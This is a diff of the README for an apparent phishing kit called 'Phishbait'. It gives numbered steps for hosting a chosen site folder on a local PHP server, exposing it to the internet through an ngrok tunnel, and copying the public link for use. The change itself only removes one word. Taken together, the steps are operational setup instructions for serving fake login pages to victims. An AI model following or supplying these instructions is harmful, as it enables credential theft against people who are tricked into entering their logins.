RDMORALES20/Phishbait-login.php/README.md

 {02} --⫸ Open Another Window
-{03} --⫸ cd Website, then cd *site you want to host* {04} --⫸ Launch PHP Localhost Server Using Port 3333 (php -S localhost:3333) {05} --⫸ Open Another Window and Tunnel Your Localhost (ngrok http 3333) {06} --⫸ Copy The Link That ngrok Create
+{03} --⫸ cd Website, then cd *site you want to host* {04} --⫸ Launch PHP Localhost Server Using Port 3333 (php -S localhost:3333) {05} --⫸ Open Another Window  Tunnel Your Localhost (ngrok http 3333) {06} --⫸ Copy The Link That ngrok Create
 {07} --⫸ Choose The Website you Wish on Phishbait
 {08} --⫸ Now ngrok's Link is Ready.
 If you Check, Your Localhost Server is Working Good.